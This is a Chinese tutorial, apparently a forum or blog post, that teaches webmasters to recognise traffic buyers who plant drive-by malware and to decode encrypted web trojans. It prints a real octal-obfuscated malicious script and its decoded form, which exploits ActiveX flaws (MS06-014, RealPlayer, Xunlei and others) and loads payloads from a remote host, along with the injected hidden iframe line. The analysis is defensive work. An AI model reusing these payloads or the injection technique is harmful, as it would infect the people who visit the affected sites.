教你如何识别挂马者,并破解加密网马!

一般挂马者都喜欢找图片站,电影站,网址站等娱乐性站点...如果你技术又不太行,而又不想挂马,那要怎么样来识别挂马者呢?(当然,想挣这个钱的站长例外,可以不看!)

1,如何识别挂者?

  1.1,突然一天,一个QQ加你说以高价的方式收流量(通常是100元/1万IP,按IP的质量来算.),其他大家想都能想到,有什么广告能值100元/1万呢? 99%是挂马的. 

  1.2,突然有一天,一个QQ加你说要买文字或图片广告,但是用要JS调用或者框架(iframe)引用代码,以方便统计. 这种情况只要你不要挂马,直接QQ拉黑,100%挂马者. 我一个朋友就上了一当,对方给50元/万IP按展示付费.最后我说你站被挂马,他还不知道怎么回事.后来气得哇哇叫...说要找一万只肉鸡D死那Y的.. 

  1.3,如果你不相信第2点,挂上了对方的代码广告,杀毒软件并未报毒.那就请看打开网页时的反应.如果打开网页卡,甚至IE假死.100%有马! 如果你装了RealOne并没有打补丁,打开网页时弹一下RealOne播放器,100%有马!

/////////////////BY 俺老虎 ()////////////////////

2,如何查找和破解加密网马? 

  2.1,当然,我这个方法并不能破解所有加密网马. 

  2.2,我现在随便在网上找一个图片站吧...(这是那位兄弟的,不好意思了,我是随便乱找的).打开这个站卡了我一分钟,并弹出RealOne.确定有马,那我就来解剖它,把马找出来吧. 

    2.2.1,查看源码,按Ctrl+F搜索"iframe",没有找到内容.那就能肯定站长不是用框架来挂的了,那继续查找"script" 这下找到这么一句<SCRIPT language=javascript src="admin/js/top.js"></SCRIPT>.网马可能就挂在这里面,我们下载它.发现其内容如下:document.writeln("<iframe src=http:////www.iceak.net//dl19.htm?001 width=1 height=1><//iframe>"); 果不其然.... 

    2.2.2,把框架的长和宽都设置成1不想让人看见啊?继续打开..查看源码,里面还是一个框架~<iframe src=news.html width=100 height=0></iframe> 

    2.2.3,继续打开..这下内容出来了...我还以为你要藏10层呢...内容如下:
<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("/151/146/50/144/157/143/165/155/145/156/164/56/143/157/157/153/151/145/56/151/156/144/145/170/117/146/50/47/117/113/47/51/75/75/55/61/51/173/15/12/164/162/171/173/166/141/162/40/145/145/145/145/145/145/145/145/73/15/12/166/141/162/40/144/163/142/75/42/113/141/163/160/145/162/163/153/171/42/73/15/12/166/141/162/40/141/144/157/75/50/144/157/143/165/155/145/156/164/56/143/162/145/141/164/145/105/154/145/155/145/156/164/50/42/134/170/66/146/134/170/66/62/134/170/66/141/134/170/66/65/134/170/66/63/134/170/67/64/42/51/51/73/15/12/166/141/162/40/122/151/163/151/156/147/75/42/134/170/66/63/134/170/66/143/134/170/66/61/134/170/67/63/134/170/67/63/134/170/66/71/134/170/66/64/42/73/15/12/166/141/162/40/113/126/62/60/60/70/75/42/134/170/64/61/134/170/66/64/134/170/66/146/134/170/66/64/134/170/66/62/134/170/62/145/134/170/65/63/134/170/67/64/134/170/67/62/134/170/66/65/134/170/66/61/134/170/66/144/42/73/15/12/166/141/162/40/113/141/163/160/145/162/163/153/171/75/42/134/170/66/63/134/170/66/143/134/170/67/63/134/170/66/71/134/170/66/64/134/170/63/141/134/170/64/62/134/170/64/64/134/170/63/71/134/170/63/66/134/170/64/63/134/170/63/65/134/170/63/65/134/170/63/66/134/170/62/144/134/170/63/66/134/170/63/65/134/170/64/61/134/170/63/63/134/170/62/144/134/170/63/61/134/170/63/61/134/170/64/64/134/170/63/60/134/170/62/144/134/170/63/71/134/170/63/70/134/170/63/63/134/170/64/61/134/170/62/144/134/170/63/60/134/170/63/60/134/170/64/63/134/170/63/60/134/170/63/64/134/170/64/66/134/170/64/63/134/170/63/62/134/170/63/71/134/170/64/65/134/170/63/63/134/170/63/66/42/73/15/12/141/144/157/56/163/145/164/101/164/164/162/151/142/165/164/145/50/122/151/163/151/156/147/54/113/141/163/160/145/162/163/153/171/51/73/15/12/166/141/162/40/141/163/75/141/144/157/56/143/162/145/141/164/145/157/142/152/145/143/164/50/113/126/62/60/60/70/54/42/42/51/175/15/12/143/141/164/143/150/50/145/145/145/145/145/145/145/145/51/173/175/73/15/12/146/151/156/141/154/154/171/173/15/12/166/141/162/40/145/170/160/151/162/145/163/75/156/145/167/40/104/141/164/145/50/51/73/15/12/145/170/160/151/162/145/163/56/163/145/164/124/151/155/145/50/145/170/160/151/162/145/163/56/147/145/164/124/151/155/145/50/51/53/63/52/66/60/52/66/60/52/61/60/60/60/51/73/15/12/144/157/143/165/155/145/156/164/56/143/157/157/153/151/145/75/47/117/113/75/131/145/163/73/160/141/164/150/75/57/73/145/170/160/151/162/145/163/75/47/53/145/170/160/151/162/145/163/56/164/157/107/115/124/123/164/162/151/156/147/50/51/73/15/12/151/146/50/145/145/145/145/145/145/145/145/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/163/143/162/151/160/164/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/134/57/155/163/60/66/60/61/64/56/152/163/76/74/134/57/163/143/162/151/160/164/76/42/51/175/15/12/145/154/163/145/173/15/12/164/162/171/173/166/141/162/40/146/146/146/146/146/146/146/146/73/15/12/166/141/162/40/157/165/162/147/141/155/145/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/67/134/170/64/143/134/170/64/63/134/170/64/70/134/170/64/61/134/170/65/64/134/170/62/145/134/170/64/67/134/170/64/143/134/170/64/63/134/170/66/70/134/170/66/61/134/170/67/64/134/170/64/63/134/170/67/64/134/170/67/62/134/170/66/143/134/170/62/145/134/170/63/61/42/51/73/175/15/12/143/141/164/143/150/50/146/146/146/146/146/146/146/146/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/146/146/146/146/146/146/146/146/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/107/114/127/117/122/114/104/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/147/147/147/147/147/147/147/147/73/15/12/166/141/162/40/163/164/157/162/155/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/144/134/170/65/60/134/170/65/63/134/170/62/145/134/170/65/63/134/170/67/64/134/170/66/146/134/170/67/62/134/170/66/144/134/170/65/60/134/170/66/143/134/170/66/61/134/170/67/71/134/170/66/65/134/170/67/62/42/51/73/175/15/12/143/141/164/143/150/50/147/147/147/147/147/147/147/147/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/147/147/147/147/147/147/147/147/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/123/164/157/162/155/111/111/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/150/150/150/150/150/150/150/150/73/15/12/166/141/162/40/122/145/141/154/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/71/134/170/64/65/134/170/65/62/134/170/65/60/134/170/64/63/134/170/67/64/134/170/66/143/134/170/62/145/134/170/64/71/134/170/64/65/134/170/65/62/134/170/65/60/134/170/64/63/134/170/67/64/134/170/66/143/134/170/62/145/134/170/63/61/42/51/73/175/15/12/143/141/164/143/150/50/150/150/150/150/150/150/150/150/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/150/150/150/150/150/150/150/150/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/163/103/162/111/160/124/40/114/101/156/107/165/101/147/105/75/42/152/101/166/101/163/103/162/111/160/124/42/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/134/57/162/145/141/154/56/152/163/76/74/134/57/163/143/162/151/160/164/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/151/151/151/151/151/151/151/151/73/15/12/166/141/162/40/164/150/165/156/144/145/162/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/64/134/170/65/60/134/170/64/63/134/170/66/143/134/170/66/71/134/170/66/65/134/170/66/145/134/170/67/64/134/170/62/145/134/170/65/66/134/170/66/146/134/170/66/64/42/51/73/175/15/12/143/141/164/143/150/50/151/151/151/151/151/151/151/151/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/151/151/151/151/151/151/151/151/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/124/150/165/156/144/145/162/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/153/153/153/153/153/153/153/153/73/15/12/166/141/162/40/102/141/151/144/165/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/62/134/170/66/61/134/170/66/71/134/170/66/64/134/170/67/65/134/170/64/62/134/170/66/61/134/170/67/62/134/170/62/145/134/170/65/64/134/170/66/146/134/170/66/146/134/170/66/143/42/51/73/175/15/12/143/141/164/143/150/50/153/153/153/153/153/153/153/153/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/153/153/153/153/153/153/153/153/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/102/141/151/144/165/133/42/134/170/64/64/134/170/66/143/134/170/66/146/134/170/66/61/134/170/66/64/42/53/42/134/170/64/64/134/170/65/63/42/135/50/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/102/141/151/144/165/56/143/141/142/42/54/40/42/134/170/64/62/134/170/66/61/134/170/66/71/134/170/66/64/134/170/67/65/134/170/62/145/134/170/66/65/134/170/67/70/134/170/66/65/42/54/40/60/51/175/175/15/12/151/146/50/146/146/146/146/146/146/146/146/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/147/147/147/147/147/147/147/147/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/150/150/150/150/150/150/150/150/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/151/151/151/151/151/151/151/151/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/15/12/173/15/12/154/157/143/141/164/151/157/156/56/162/145/160/154/141/143/145/50/42/141/142/157/165/164/72/142/154/141/156/153/42/51/73/175/15/12/175/175/175")
</script> 

    2.2.4,能看懂的就不说了,不能看懂就是加过密成8进制的网页木马的内容了.那要怎么知道它到底在干些啥呢?下一步! 

 2.3,在得到以上加密内容后按下面操作,就可以得到它的加密内容了. 

    2.3.1,自己新建一个A.HTML,其内容如下:
<script>
document.write("<textarea cols=55 rows=10>"+ " 填上以上所有在eval里看不懂的8进制数 " +"</textarea>");
</script> 

    2.3.2,保存以上内容后,在浏览器里打开A.HTML,这个木马就是以下内容:

if(document.cookie.indexOf('OK')==-1){
try{var eeeeeeee;
var dsb="Kaspersky";
var ado=(document.createElement("/x6f/x62/x6a/x65/x63/x74"));
var Rising="/x63/x6c/x61/x73/x73/x69/x64";
var KV2008="/x41/x64/x6f/x64/x62/x2e/x53/x74/x72/x65/x61/x6d";
var Kaspersky="/x63/x6c/x73/x69/x64/x3a/x42/x44/x39/x36/x43/x35/x35/x36/x2d/x36/x35/x41/x33/x2d/x31/x31/x44/x30/x2d/x39/x38/x33/x41/x2d/x30/x30/x43/x30/x34/x46/x43/x32/x39/x45/x33/x36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(eeeeeeee){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
if(eeeeeeee!="[object Error]"){
document.write("<script src=http:////user3.1a2b3c0.net//ms06014.js><//script>")}
else{
try{var ffffffff;
var ourgame=new ActiveXObject("/x47/x4c/x43/x48/x41/x54/x2e/x47/x4c/x43/x68/x61/x74/x43/x74/x72/x6c/x2e/x31");}
catch(ffffffff){};
finally{if(ffffffff!="[object Error]"){
document.write('<iframe style=display:none src=";')}}
try{var gggggggg;
var storm=new ActiveXObject("/x4d/x50/x53/x2e/x53/x74/x6f/x72/x6d/x50/x6c/x61/x79/x65/x72");}
catch(gggggggg){};
finally{if(gggggggg!="[object Error]"){
document.write('<iframe style=display:none src=";')}}
try{var hhhhhhhh;
var Real=new ActiveXObject("/x49/x45/x52/x50/x43/x74/x6c/x2e/x49/x45/x52/x50/x43/x74/x6c/x2e/x31");}
catch(hhhhhhhh){};
finally{if(hhhhhhhh!="[object Error]"){
document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:////user3.1a2b3c0.net//real.js><//script>')}}
try{var iiiiiiii;
var thunder=new ActiveXObject("/x44/x50/x43/x6c/x69/x65/x6e/x74/x2e/x56/x6f/x64");}
catch(iiiiiiii){};
finally{if(iiiiiiii!="[object Error]"){
document.write('<iframe style=display:none src=";')}}
try{var kkkkkkkk;
var Baidu=new ActiveXObject("/x42/x61/x69/x64/x75/x42/x61/x72/x2e/x54/x6f/x6f/x6c");}
catch(kkkkkkkk){};
finally{if(kkkkkkkk!="[object Error]"){
Baidu["/x44/x6c/x6f/x61/x64"+"/x44/x53"](";, "/x42/x61/x69/x64/x75/x2e/x65/x78/x65", 0)}}
if(ffffffff=="[object Error]" && gggggggg=="[object Error]" && hhhhhhhh=="[object Error]" && iiiiiiii=="[object Error]")
{
location.replace("about:blank");}
}}} 

    2.3.3,里面还有一些比如"/x47/x4c/x43/x48/x41/x54/x2e/x47/"的16六进制数,也可以按上面的步骤得到真实的数据. 看看这个马,我也不再打算再深挖下去了,可以看出这是个组合网马,包含MS06014网马,RealOne网马,迅雷网马等...总之就是要利用一切可能的漏洞让你下载木马或插件. 

    2.3.4,这方法还可以帮你去偷别个的VIP网马,不过本方法只适合于数制转换加密,有的网马用的自己的加秘函数,不过也是有办法破解的...因为无论再怎么加密只是让人看不懂,机器总会看得懂的...所以要破解这样的加密方式也很简单,把对应的一个Return改成document.write也一样能看到本来面目... 

    最后,此文一发,势必会引起很多人的反感...我是否有罪呢?也许吧!断了别人的财路,确也不该. 但是如果站长不再挂毒了,网民看网页不再怕了,上网就是等于QQ的时代也就过去了,更多的人上网是来看翻网页的,那我们站长的钱路不就更宽了吗? 想想也算是为了中国互联网天空更加纯净出了微乎其微的一份力吧...